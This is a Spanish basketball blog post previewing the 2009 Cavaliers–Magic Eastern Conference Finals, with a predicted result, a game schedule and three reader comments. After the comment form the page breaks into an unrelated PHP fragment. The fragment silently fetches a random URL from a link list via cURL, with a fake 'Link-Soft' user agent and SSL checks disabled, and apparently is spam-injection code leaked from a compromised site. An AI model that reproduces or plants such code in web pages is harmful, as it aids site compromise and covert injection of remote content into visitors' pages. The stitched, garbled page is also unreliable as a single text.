Finales del Este 2009: Cavaliers – Magic

20 de May de 2009 por TheDeerHunter

A la 1h30 AM (hora española) va a comenzar una de las finales más interesantes de los últimos años en el Este.

Ningún equipo de la Conferencia Este ha logrado ganar en Cleveland este año y sobre el papel son favoritos. Sin embargo, los Magic ya les han vencido un par de veces esta temporada dejándoles por debajo de 90 puntos y estructuralmente es un equipo que se le puede indigestar mucho a Lebron y sus escuderos. Es por esto que la eliminatoria se presenta igualada y emocionante.

Los Cavs deben asumir el papel de favoritos en la primera situación verdaderamente difícil de la temporada. Orlando ya ha cumplido con las expectativas con alcanzar la final y eliminar a Boston, por lo que toda la presión queda sobre el tejado rival. Si no se alcanza la final sería un importante golpe moral en los pilares de este proyecto.

Los factores que deben decidir el signo de la eliminatoria son:

– El Quicken Loans Arena de Cleveland, hasta ahora inexpugnable.

– El cuadro “fácil” al que se han tenido que enfrentar los Cavs. No se han examinado contra ninguna situación de riesgo. Orlando las lleva pasando canutas desde primera ronda y es previsible que se puedan encontrar más enchufados.

– El ritmo de juego. Si Lebron puede correr los Magic ya pueden ir preparando las maletas.

– La oposición interior a Dwight Howard. Ilgauskas, Ben Wallace o incluso Varejao saben hacer su trabajo pero van a tener que sudar…

– El dominio del rebote. De él depende en buena medida el rendimiento de las principales armas de ambos equipos. El lanzamiento indiscriminado por parte de Orlando y el contraataque por parte de Cavaliers.

– El perímetro alto de Orlando, con Lewis y Turkoglu. Veremos qué respuesta tiene Mike Brown contra estos atípicos recursos. ¿Jugará Joe Smith todavía más minutos?

Pronóstico: 4-2 Cavs.

HORARIOS

– Próxima madrugada 1:30 AM (siempre hora española) en Cleveland.

– Viernes 22 a las 2:30 AM en Cleveland.

– Domingo 24 a las 2:30 AM en Orlando.

– Martes 26 a las 2:30 AM en Orlando.

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Sí que se presenta interesante, sí. Hasta que se demuestre lo contrario, los Cavs son muy favoritos. Como se insinúa en el análisis, el control del ritmo del juego y el rebote van a ser esenciales. Dwight tiene que arrasar, controlar las dos zonas y ser un sello en defensa para que los Magic tengan opciones.
    Va a ser bonito el choque LeBron-Dwight cada vez que James vaya hasta la cocina.

      Citar

  2. xapa_croack dice:
    #2

    Deer todos los partidos de la final incluido los de hoy son a las 2.30 hora española.

      Citar

  3. Jabho dice:
    #3

    Bueno ahí va mi apuesta: 4-0 o 4-1 para los Cavs… fácil, fácil.

    He seguido toda la serie de los Magic contra los Celtics y me han gustado muy, muy poco. Salvo el turco, el resto desaparece en los momentos difíciles….

    No sé, no me van estos Magic. Decir que han cumplido llegando a la final cuando se han postulado como favoritos me parece poco. Han cumplido con un aprobado muy raspado hasta ahora. Han ganado a Philly que jugaba sin su teórica referencia interior (Brand) y algún partido sin Young si no recuerdo mal y contra Boston. Es cierto que les falta Nelson, que seguro mejora la imagen del equipo cuando está enchufado, pero al menos cubrieron de forma decente la baja con Alston.

    La ventaja de los Magic, Howard a parte, es Lewis de 4 que provoca un desequilibrio que a los Celtics les ha costado y mucho defender. El resto de aspectos es muy superior los Cavs y el tema de Howard justo creo que a los Cavs que tienen muchos interiores para pelear y hacer faltas no les va dar demasiados quebraderos. Ademas ojo a Big Z que tiene buena mano y si consigue alejar a Howard del centro de la zona la defensa de los Magic se resiente…

    Pues eso, que aposté por los Cavs a principio de temporada y eso que suponia que en este punto se encontrarían con los Celtics. Con los Magic no creo que tengan demasiados problemas…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>